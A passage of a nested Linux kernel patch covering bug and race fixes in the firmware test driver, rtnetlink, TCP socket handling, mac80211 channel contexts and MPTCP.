++		goto out_bail;
++	}
++
+ 	test_fw_config->reqs =
+ 		vzalloc(array3_size(sizeof(struct test_batched_req),
+ 				    test_fw_config->num_requests, 2));
+@@ -1009,6 +1035,7 @@ ssize_t trigger_batched_requests_async_store(struct device *dev,
+ 	for (i = 0; i < test_fw_config->num_requests; i++) {
+ 		req = &test_fw_config->reqs[i];
+ 		req->name = test_fw_config->name;
++		req->fw_buf = NULL;
+ 		req->fw = NULL;
+ 		req->idx = i;
+ 		init_completion(&req->completion);
+diff --git a/net/atm/resources.c b/net/atm/resources.c
+index 2b2d33eeaf200..995d29e7fb138 100644
+--- a/net/atm/resources.c
++++ b/net/atm/resources.c
+@@ -400,6 +400,7 @@ done:
+ 	return error;
+ }
+ 
++#ifdef CONFIG_PROC_FS
+ void *atm_dev_seq_start(struct seq_file *seq, loff_t *pos)
+ {
+ 	mutex_lock(&atm_dev_mutex);
+@@ -415,3 +416,4 @@ void *atm_dev_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ {
+ 	return seq_list_next(v, &atm_devs, pos);
+ }
++#endif
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 74864dc46a7ef..b192c69f3936c 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3212,6 +3212,7 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ 	struct net_device *dev;
+ 	unsigned int num_tx_queues = 1;
+ 	unsigned int num_rx_queues = 1;
++	int err;
+ 
+ 	if (tb[IFLA_NUM_TX_QUEUES])
+ 		num_tx_queues = nla_get_u32(tb[IFLA_NUM_TX_QUEUES]);
+@@ -3247,13 +3248,18 @@ struct net_device *rtnl_create_link(struct net *net, const char *ifname,
+ 	if (!dev)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	err = validate_linkmsg(dev, tb, extack);
++	if (err < 0) {
++		free_netdev(dev);
++		return ERR_PTR(err);
++	}
++
+ 	dev_net_set(dev, net);
+ 	dev->rtnl_link_ops = ops;
+ 	dev->rtnl_link_state = RTNL_LINK_INITIALIZING;
+ 
+ 	if (tb[IFLA_MTU]) {
+ 		u32 mtu = nla_get_u32(tb[IFLA_MTU]);
+-		int err;
+ 
+ 		err = dev_validate_mtu(dev, mtu, extack);
+ 		if (err) {
+diff --git a/net/core/sock.c b/net/core/sock.c
+index eb0b76acd9df1..83f590d8d0850 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2370,7 +2370,6 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst)
+ {
+ 	u32 max_segs = 1;
+ 
+-	sk_dst_set(sk, dst);
+ 	sk->sk_route_caps = dst->dev->features;
+ 	if (sk_is_tcp(sk))
+ 		sk->sk_route_caps |= NETIF_F_GSO;
+@@ -2392,6 +2391,7 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst)
+ 		}
+ 	}
+ 	sk->sk_gso_max_segs = max_segs;
++	sk_dst_set(sk, dst);
+ }
+ EXPORT_SYMBOL_GPL(sk_setup_caps);
+ 
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5fd0ff5734e36..ebb737ac9e894 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -589,6 +589,7 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending += writebias;
++	sk->sk_wait_pending++;
+ 
+ 	/* Basic assumption: if someone sets sk->sk_err, he _must_
+ 	 * change state of the socket from TCP_SYN_*.
+@@ -604,6 +605,7 @@ static long inet_wait_for_connect(struct sock *sk, long timeo, int writebias)
+ 	}
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	sk->sk_write_pending -= writebias;
++	sk->sk_wait_pending--;
+ 	return timeo;
+ }
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 916075e00d066..8e35ea66d930a 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1143,6 +1143,7 @@ struct sock *inet_csk_clone_lock(const struct sock *sk,
+ 	if (newsk) {
+ 		struct inet_connection_sock *newicsk = inet_csk(newsk);
+ 
++		newsk->sk_wait_pending = 0;
+ 		inet_sk_set_state(newsk, TCP_SYN_RECV);
+ 		newicsk->icsk_bind_hash = NULL;
+ 		newicsk->icsk_bind2_hash = NULL;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 021a8bf6a1898..0bd0be3c63d22 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -3079,6 +3079,12 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	int old_state = sk->sk_state;
+ 	u32 seq;
+ 
++	/* Deny disconnect if other threads are blocked in sk_wait_event()
++	 * or inet_wait_for_connect().
++	 */
++	if (sk->sk_wait_pending)
++		return -EBUSY;
++
+ 	if (old_state != TCP_CLOSE)
+ 		tcp_set_state(sk, TCP_CLOSE);
+ 
+@@ -4065,7 +4071,8 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 	switch (optname) {
+ 	case TCP_MAXSEG:
+ 		val = tp->mss_cache;
+-		if (!val && ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)))
++		if (tp->rx_opt.user_mss &&
++		    ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 			val = tp->rx_opt.user_mss;
+ 		if (tp->repair)
+ 			val = tp->rx_opt.mss_clamp;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index ac44edd6f52e6..5dabb38b857ff 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -4529,7 +4529,7 @@ static void tcp_sack_maybe_coalesce(struct tcp_sock *tp)
+ 	}
+ }
+ 
+-static void tcp_sack_compress_send_ack(struct sock *sk)
++void tcp_sack_compress_send_ack(struct sock *sk)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index cb79127f45c34..0b5d0a2867a8c 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -290,9 +290,19 @@ static int tcp_write_timeout(struct sock *sk)
+ void tcp_delack_timer_handler(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
++	struct tcp_sock *tp = tcp_sk(sk);
+ 
+-	if (((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN)) ||
+-	    !(icsk->icsk_ack.pending & ICSK_ACK_TIMER))
++	if ((1 << sk->sk_state) & (TCPF_CLOSE | TCPF_LISTEN))
++		return;
++
++	/* Handle the sack compression case */
++	if (tp->compressed_ack) {
++		tcp_mstamp_refresh(tp);
++		tcp_sack_compress_send_ack(sk);
++		return;
++	}
++
++	if (!(icsk->icsk_ack.pending & ICSK_ACK_TIMER))
+ 		return;
+ 
+ 	if (time_after(icsk->icsk_ack.timeout, jiffies)) {
+@@ -312,7 +322,7 @@ void tcp_delack_timer_handler(struct sock *sk)
+ 			inet_csk_exit_pingpong_mode(sk);
+ 			icsk->icsk_ack.ato      = TCP_ATO_MIN;
+ 		}
+-		tcp_mstamp_refresh(tcp_sk(sk));
++		tcp_mstamp_refresh(tp);
+ 		tcp_send_ack(sk);
+ 		__NET_INC_STATS(sock_net(sk), LINUX_MIB_DELAYEDACKS);
+ 	}
+diff --git a/net/mac80211/chan.c b/net/mac80211/chan.c
+index e72cf0749d492..f07e34bed8f3a 100644
+--- a/net/mac80211/chan.c
++++ b/net/mac80211/chan.c
+@@ -258,7 +258,8 @@ ieee80211_get_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 
+ static enum nl80211_chan_width
+ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+-					  struct ieee80211_chanctx_conf *conf)
++					  struct ieee80211_chanctx *ctx,
++					  struct ieee80211_link_data *rsvd_for)
+ {
+ 	enum nl80211_chan_width max_bw = NL80211_CHAN_WIDTH_20_NOHT;
+ 	struct ieee80211_vif *vif = &sdata->vif;
+@@ -267,13 +268,14 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 	rcu_read_lock();
+ 	for (link_id = 0; link_id < ARRAY_SIZE(sdata->link); link_id++) {
+ 		enum nl80211_chan_width width = NL80211_CHAN_WIDTH_20_NOHT;
+-		struct ieee80211_bss_conf *link_conf =
+-			rcu_dereference(sdata->vif.link_conf[link_id]);
++		struct ieee80211_link_data *link =
++			rcu_dereference(sdata->link[link_id]);
+ 
+-		if (!link_conf)
++		if (!link)
+ 			continue;
+ 
+-		if (rcu_access_pointer(link_conf->chanctx_conf) != conf)
++		if (link != rsvd_for &&
++		    rcu_access_pointer(link->conf->chanctx_conf) != &ctx->conf)
+ 			continue;
+ 
+ 		switch (vif->type) {
+@@ -287,7 +289,7 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 			 * point, so take the width from the chandef, but
+ 			 * account also for TDLS peers
+ 			 */
+-			width = max(link_conf->chandef.width,
++			width = max(link->conf->chandef.width,
+ 				    ieee80211_get_max_required_bw(sdata, link_id));
+ 			break;
+ 		case NL80211_IFTYPE_P2P_DEVICE:
+@@ -296,7 +298,7 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 		case NL80211_IFTYPE_ADHOC:
+ 		case NL80211_IFTYPE_MESH_POINT:
+ 		case NL80211_IFTYPE_OCB:
+-			width = link_conf->chandef.width;
++			width = link->conf->chandef.width;
+ 			break;
+ 		case NL80211_IFTYPE_WDS:
+ 		case NL80211_IFTYPE_UNSPECIFIED:
+@@ -316,7 +318,8 @@ ieee80211_get_chanctx_vif_max_required_bw(struct ieee80211_sub_if_data *sdata,
+ 
+ static enum nl80211_chan_width
+ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx_conf *conf)
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+ 	struct ieee80211_sub_if_data *sdata;
+ 	enum nl80211_chan_width max_bw = NL80211_CHAN_WIDTH_20_NOHT;
+@@ -328,7 +331,8 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+ 		if (!ieee80211_sdata_running(sdata))
+ 			continue;
+ 
+-		width = ieee80211_get_chanctx_vif_max_required_bw(sdata, conf);
++		width = ieee80211_get_chanctx_vif_max_required_bw(sdata, ctx,
++								  rsvd_for);
+ 
+ 		max_bw = max(max_bw, width);
+ 	}
+@@ -336,8 +340,8 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+ 	/* use the configured bandwidth in case of monitor interface */
+ 	sdata = rcu_dereference(local->monitor_sdata);
+ 	if (sdata &&
+-	    rcu_access_pointer(sdata->vif.bss_conf.chanctx_conf) == conf)
+-		max_bw = max(max_bw, conf->def.width);
++	    rcu_access_pointer(sdata->vif.bss_conf.chanctx_conf) == &ctx->conf)
++		max_bw = max(max_bw, ctx->conf.def.width);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -349,8 +353,10 @@ ieee80211_get_chanctx_max_required_bw(struct ieee80211_local *local,
+  * the max of min required widths of all the interfaces bound to this
+  * channel context.
+  */
+-static u32 _ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-					     struct ieee80211_chanctx *ctx)
++static u32
++_ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
++				  struct ieee80211_chanctx *ctx,
++				  struct ieee80211_link_data *rsvd_for)
+ {
+ 	enum nl80211_chan_width max_bw;
+ 	struct cfg80211_chan_def min_def;
+@@ -370,7 +376,7 @@ static u32 _ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+ 		return 0;
+ 	}
+ 
+-	max_bw = ieee80211_get_chanctx_max_required_bw(local, &ctx->conf);
++	max_bw = ieee80211_get_chanctx_max_required_bw(local, ctx, rsvd_for);
+ 
+ 	/* downgrade chandef up to max_bw */
+ 	min_def = ctx->conf.def;
+@@ -448,9 +454,10 @@ static void ieee80211_chan_bw_change(struct ieee80211_local *local,
+  * channel context.
+  */
+ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx *ctx)
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+-	u32 changed = _ieee80211_recalc_chanctx_min_def(local, ctx);
++	u32 changed = _ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 
+ 	if (!changed)
+ 		return;
+@@ -464,10 +471,11 @@ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, ctx, false);
+ }
+ 
+-static void ieee80211_change_chanctx(struct ieee80211_local *local,
+-				     struct ieee80211_chanctx *ctx,
+-				     struct ieee80211_chanctx *old_ctx,
+-				     const struct cfg80211_chan_def *chandef)
++static void _ieee80211_change_chanctx(struct ieee80211_local *local,
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_chanctx *old_ctx,
++				      const struct cfg80211_chan_def *chandef,
++				      struct ieee80211_link_data *rsvd_for)
+ {
+ 	u32 changed;
+ 
+@@ -492,7 +500,7 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, old_ctx, true);
+ 
+ 	if (cfg80211_chandef_identical(&ctx->conf.def, chandef)) {
+-		ieee80211_recalc_chanctx_min_def(local, ctx);
++		ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 		return;
+ 	}
+ 
+@@ -502,7 +510,7 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 
+ 	/* check if min chanctx also changed */
+ 	changed = IEEE80211_CHANCTX_CHANGE_WIDTH |
+-		  _ieee80211_recalc_chanctx_min_def(local, ctx);
++		  _ieee80211_recalc_chanctx_min_def(local, ctx, rsvd_for);
+ 	drv_change_chanctx(local, ctx, changed);
+ 
+ 	if (!local->use_chanctx) {
+@@ -514,6 +522,14 @@ static void ieee80211_change_chanctx(struct ieee80211_local *local,
+ 	ieee80211_chan_bw_change(local, old_ctx, false);
+ }
+ 
++static void ieee80211_change_chanctx(struct ieee80211_local *local,
++				     struct ieee80211_chanctx *ctx,
++				     struct ieee80211_chanctx *old_ctx,
++				     const struct cfg80211_chan_def *chandef)
++{
++	_ieee80211_change_chanctx(local, ctx, old_ctx, chandef, NULL);
++}
++
+ static struct ieee80211_chanctx *
+ ieee80211_find_chanctx(struct ieee80211_local *local,
+ 		       const struct cfg80211_chan_def *chandef,
+@@ -638,7 +654,7 @@ ieee80211_alloc_chanctx(struct ieee80211_local *local,
+ 	ctx->conf.rx_chains_dynamic = 1;
+ 	ctx->mode = mode;
+ 	ctx->conf.radar_enabled = false;
+-	ieee80211_recalc_chanctx_min_def(local, ctx);
++	_ieee80211_recalc_chanctx_min_def(local, ctx, NULL);
+ 
+ 	return ctx;
+ }
+@@ -855,6 +871,9 @@ static int ieee80211_assign_link_chanctx(struct ieee80211_link_data *link,
+ 	}
+ 
+ 	if (new_ctx) {
++		/* recalc now, considering the link we'll use it for */
++		ieee80211_recalc_chanctx_min_def(local, new_ctx, link);
++
+ 		ret = drv_assign_vif_chanctx(local, sdata, link->conf, new_ctx);
+ 		if (ret)
+ 			goto out;
+@@ -873,12 +892,12 @@ out:
+ 		ieee80211_recalc_chanctx_chantype(local, curr_ctx);
+ 		ieee80211_recalc_smps_chanctx(local, curr_ctx);
+ 		ieee80211_recalc_radar_chanctx(local, curr_ctx);
+-		ieee80211_recalc_chanctx_min_def(local, curr_ctx);
++		ieee80211_recalc_chanctx_min_def(local, curr_ctx, NULL);
+ 	}
+ 
+ 	if (new_ctx && ieee80211_chanctx_num_assigned(local, new_ctx) > 0) {
+ 		ieee80211_recalc_txpower(sdata, false);
+-		ieee80211_recalc_chanctx_min_def(local, new_ctx);
++		ieee80211_recalc_chanctx_min_def(local, new_ctx, NULL);
+ 	}
+ 
+ 	if (sdata->vif.type != NL80211_IFTYPE_P2P_DEVICE &&
+@@ -1270,7 +1289,7 @@ ieee80211_link_use_reserved_reassign(struct ieee80211_link_data *link)
+ 
+ 	ieee80211_link_update_chandef(link, &link->reserved_chandef);
+ 
+-	ieee80211_change_chanctx(local, new_ctx, old_ctx, chandef);
++	_ieee80211_change_chanctx(local, new_ctx, old_ctx, chandef, link);
+ 
+ 	vif_chsw[0].vif = &sdata->vif;
+ 	vif_chsw[0].old_ctx = &old_ctx->conf;
+@@ -1300,7 +1319,7 @@ ieee80211_link_use_reserved_reassign(struct ieee80211_link_data *link)
+ 	if (ieee80211_chanctx_refcount(local, old_ctx) == 0)
+ 		ieee80211_free_chanctx(local, old_ctx);
+ 
+-	ieee80211_recalc_chanctx_min_def(local, new_ctx);
++	ieee80211_recalc_chanctx_min_def(local, new_ctx, NULL);
+ 	ieee80211_recalc_smps_chanctx(local, new_ctx);
+ 	ieee80211_recalc_radar_chanctx(local, new_ctx);
+ 
+@@ -1665,7 +1684,7 @@ static int ieee80211_vif_use_reserved_switch(struct ieee80211_local *local)
+ 		ieee80211_recalc_chanctx_chantype(local, ctx);
+ 		ieee80211_recalc_smps_chanctx(local, ctx);
+ 		ieee80211_recalc_radar_chanctx(local, ctx);
+-		ieee80211_recalc_chanctx_min_def(local, ctx);
++		ieee80211_recalc_chanctx_min_def(local, ctx, NULL);
+ 
+ 		list_for_each_entry_safe(link, link_tmp, &ctx->reserved_links,
+ 					 reserved_chanctx_list) {
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index e57001e00a3d0..27479bbb093ac 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2475,7 +2475,8 @@ int ieee80211_chanctx_refcount(struct ieee80211_local *local,
+ void ieee80211_recalc_smps_chanctx(struct ieee80211_local *local,
+ 				   struct ieee80211_chanctx *chanctx);
+ void ieee80211_recalc_chanctx_min_def(struct ieee80211_local *local,
+-				      struct ieee80211_chanctx *ctx);
++				      struct ieee80211_chanctx *ctx,
++				      struct ieee80211_link_data *rsvd_for);
+ bool ieee80211_is_radar_required(struct ieee80211_local *local);
+ 
+ void ieee80211_dfs_cac_timer(unsigned long data);
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 0785d9393e718..784b9ba61581e 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2899,7 +2899,7 @@ void ieee80211_recalc_min_chandef(struct ieee80211_sub_if_data *sdata,
+ 
+ 		chanctx = container_of(chanctx_conf, struct ieee80211_chanctx,
+ 				       conf);
+-		ieee80211_recalc_chanctx_min_def(local, chanctx);
++		ieee80211_recalc_chanctx_min_def(local, chanctx, NULL);
+ 	}
+  unlock:
+ 	mutex_unlock(&local->chanctx_mtx);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index ea46a5cb1c30f..59186997c3e2e 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -111,8 +111,8 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	if (err)
+ 		return err;
+ 
+-	msk->first = ssock->sk;
+-	msk->subflow = ssock;
++	WRITE_ONCE(msk->first, ssock->sk);
++	WRITE_ONCE(msk->subflow, ssock);
+ 	subflow = mptcp_subflow_ctx(ssock->sk);
+ 	list_add(&subflow->node, &msk->conn_list);
+ 	sock_hold(ssock->sk);
+@@ -599,7 +599,7 @@ static bool mptcp_check_data_fin(struct sock *sk)
+ 		WRITE_ONCE(msk->ack_seq, msk->ack_seq + 1);
+ 		WRITE_ONCE(msk->rcv_data_fin, 0);
+ 
+-		sk->sk_shutdown |= RCV_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 		smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 
+ 		switch (sk->sk_state) {
+@@ -821,6 +821,13 @@ void mptcp_data_ready(struct sock *sk, struct sock *ssk)
+ 	mptcp_data_unlock(sk);
+ }
+ 
++static void mptcp_subflow_joined(struct mptcp_sock *msk, struct sock *ssk)
++{
++	mptcp_subflow_ctx(ssk)->map_seq = READ_ONCE(msk->ack_seq);
++	WRITE_ONCE(msk->allow_infinite_fallback, false);
++	mptcp_event(MPTCP_EVENT_SUB_ESTABLISHED, msk, ssk, GFP_ATOMIC);
++}
++
+ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+@@ -835,6 +842,7 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+ 	mptcp_sockopt_sync_locked(msk, ssk);
++	mptcp_subflow_joined(msk, ssk);
+ 	return true;
+ }
+ 
+@@ -906,7 +914,7 @@ static void mptcp_check_for_eof(struct mptcp_sock *msk)
+ 		/* hopefully temporary hack: propagate shutdown status
+ 		 * to msk, when all subflows agree on it
+ 		 */
+-		sk->sk_shutdown |= RCV_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 
+ 		smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 		sk->sk_data_ready(sk);
+@@ -1683,7 +1691,6 @@ static int mptcp_sendmsg_fastopen(struct sock *sk, struct sock *ssk, struct msgh
+ 
+ 	lock_sock(ssk);
+ 	msg->msg_flags |= MSG_DONTWAIT;
+-	msk->connect_flags = O_NONBLOCK;
+ 	msk->fastopening = 1;
+ 	ret = tcp_sendmsg_fastopen(ssk, msg, copied_syn, len, NULL);
+ 	msk->fastopening = 0;
+@@ -2269,7 +2276,7 @@ static void mptcp_dispose_initial_subflow(struct mptcp_sock *msk)
+ {
+ 	if (msk->subflow) {
+ 		iput(SOCK_INODE(msk->subflow));
+-		msk->subflow = NULL;
++		WRITE_ONCE(msk->subflow, NULL);
+ 	}
+ }
+ 
+@@ -2405,7 +2412,7 @@ out_release:
+ 	sock_put(ssk);
+ 
+ 	if (ssk == msk->first)
+-		msk->first = NULL;
++		WRITE_ONCE(msk->first, NULL);
+ 
+ out:
+ 	if (ssk == msk->last_snd)
+@@ -2512,7 +2519,7 @@ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+ 	}
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 	smp_mb__before_atomic(); /* SHUTDOWN must be visible first */
+ 	set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags);
+ 
+@@ -2706,7 +2713,7 @@ static int __mptcp_init_sock(struct sock *sk)
+ 	WRITE_ONCE(msk->rmem_released, 0);
+ 	msk->timer_ival = TCP_RTO_MIN;
+ 
+-	msk->first = NULL;
++	WRITE_ONCE(msk->first, NULL);
+ 	inet_csk(sk)->icsk_sync_mss = mptcp_sync_mss;
+ 	WRITE_ONCE(msk->csum_enabled, mptcp_is_checksum_enabled(sock_net(sk)));
+ 	WRITE_ONCE(msk->allow_infinite_fallback, true);
+@@ -2941,7 +2948,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	bool do_cancel_work = false;
+ 	int subflows_alive = 0;
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if ((1 << sk->sk_state) & (TCPF_LISTEN | TCPF_CLOSE)) {
+ 		inet_sk_state_store(sk, TCP_CLOSE);
+@@ -3017,7 +3024,7 @@ static void mptcp_close(struct sock *sk, long timeout)
+ 	sock_put(sk);
+ }
+ 
+-void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk)
++static void mptcp_copy_inaddrs(struct sock *msk, const struct sock *ssk)
+ {
+ #if IS_ENABLED(CONFIG_MPTCP_IPV6)
+ 	const struct ipv6_pinfo *ssk6 = inet6_sk(ssk);
+@@ -3079,7 +3086,7 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	mptcp_pm_data_reset(msk);
+ 	mptcp_ca_reset(sk);
+ 
+-	sk->sk_shutdown = 0;
++	WRITE_ONCE(sk->sk_shutdown, 0);
+ 	sk_error_report(sk);
+ 	return 0;
+ }
+@@ -3093,9 +3100,10 @@ static struct ipv6_pinfo *mptcp_inet6_sk(const struct sock *sk)
+ }
+ #endif
+ 
+-struct sock *mptcp_sk_clone(const struct sock *sk,
+-			    const struct mptcp_options_received *mp_opt,
+-			    struct request_sock *req)
++struct sock *mptcp_sk_clone_init(const struct sock *sk,
++				 const struct mptcp_options_received *mp_opt,
++				 struct sock *ssk,
++				 struct request_sock *req)
+ {
+ 	struct mptcp_subflow_request_sock *subflow_req = mptcp_subflow_rsk(req);
+ 	struct sock *nsk = sk_clone_lock(sk, GFP_ATOMIC);
+@@ -3115,7 +3123,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk = mptcp_sk(nsk);
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+-	msk->subflow = NULL;
++	WRITE_ONCE(msk->subflow, NULL);
+ 	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+@@ -3137,10 +3145,30 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	}
+ 
+ 	sock_reset_flag(nsk, SOCK_RCU_FREE);
+-	/* will be fully established after successful MPC subflow creation */
+-	inet_sk_state_store(nsk, TCP_SYN_RECV);
+-
+ 	security_inet_csk_clone(nsk, req);
++
++	/* this can't race with mptcp_close(), as the msk is
++	 * not yet exposted to user-space
++	 */
++	inet_sk_state_store(nsk, TCP_ESTABLISHED);
++
++	/* The msk maintains a ref to each subflow in the connections list */
++	WRITE_ONCE(msk->first, ssk);
++	list_add(&mptcp_subflow_ctx(ssk)->node, &msk->conn_list);
++	sock_hold(ssk);
++
++	/* new mpc subflow takes ownership of the newly
++	 * created mptcp socket
++	 */
++	mptcp_token_accept(subflow_req, msk);
++
++	/* set msk addresses early to ensure mptcp_pm_get_local_id()
++	 * uses the correct data
++	 */
++	mptcp_copy_inaddrs(nsk, ssk);
++	mptcp_propagate_sndbuf(nsk, ssk);
++
++	mptcp_rcv_space_init(msk, ssk);
+ 	bh_unlock_sock(nsk);
+ 
+ 	/* note: the newly allocated socket refcount is 2 now */
+@@ -3172,7 +3200,7 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 	struct socket *listener;
+ 	struct sock *newsk;
+ 
+-	listener = __mptcp_nmpc_socket(msk);
++	listener = READ_ONCE(msk->subflow);
+ 	if (WARN_ON_ONCE(!listener)) {
+ 		*err = -EINVAL;
+ 		return NULL;
+@@ -3398,7 +3426,7 @@ static int mptcp_get_port(struct sock *sk, unsigned short snum)
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct socket *ssock;
+ 
+-	ssock = __mptcp_nmpc_socket(msk);
++	ssock = msk->subflow;
+ 	pr_debug("msk=%p, subflow=%p", msk, ssock);
+ 	if (WARN_ON_ONCE(!ssock))
+ 		return -EINVAL;
+@@ -3465,14 +3493,16 @@ bool mptcp_finish_join(struct sock *ssk)
+ 		return false;
+ 	}
+ 
+-	if (!list_empty(&subflow->node))
+-		goto out;
++	/* active subflow, already present inside the conn_list */
++	if (!list_empty(&subflow->node)) {
++		mptcp_subflow_joined(msk, ssk);
++		return true;
++	}
+ 
+ 	if (!mptcp_pm_allow_new_subflow(msk))
+ 		goto err_prohibited;
+ 
+-	/* active connections are already on conn_list.
+-	 * If we can't acquire msk socket lock here, let the release callback
++	/* If we can't acquire msk socket lock here, let the release callback
+ 	 * handle it
+ 	 */
+ 	mptcp_data_lock(parent);
+@@ -3495,11 +3525,6 @@ err_prohibited:
+ 		return false;
+ 	}
+ 
+-	subflow->map_seq = READ_ONCE(msk->ack_seq);
+-	WRITE_ONCE(msk->allow_infinite_fallback, false);
+-
+-out:
+-	mptcp_event(MPTCP_EVENT_SUB_ESTABLISHED, msk, ssk, GFP_ATOMIC);
+ 	return true;
+ }
+ 
+@@ -3617,9 +3642,9 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 	 * acquired the subflow socket lock, too.
+ 	 */
+ 	if (msk->fastopening)
+-		err = __inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags, 1);
++		err = __inet_stream_connect(ssock, uaddr, addr_len, O_NONBLOCK, 1);
+ 	else
+-		err = inet_stream_connect(ssock, uaddr, addr_len, msk->connect_flags);
++		err = inet_stream_connect(ssock, uaddr, addr_len, O_NONBLOCK);
+ 	inet_sk(sk)->defer_connect = inet_sk(ssock->sk)->defer_connect;
+ 
+ 	/* on successful connect, the msk state will be moved to established by
+@@ -3632,12 +3657,10 @@ static int mptcp_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+ 
+ 	mptcp_copy_inaddrs(sk, ssock->sk);
+ 
+-	/* unblocking connect, mptcp-level inet_stream_connect will error out
+-	 * without changing the socket state, update it here.
++	/* silence EINPROGRESS and let the caller, inet_stream_connect,
++	 * handle the connection in progress
+ 	 */
+-	if (err == -EINPROGRESS)
+-		sk->sk_socket->state = ssock->state;
+-	return err;
++	return 0;
+ }
+ 
+ static struct proto mptcp_prot = {
+@@ -3696,18 +3719,6 @@ unlock:
+ 	return err;
+ }
+ 
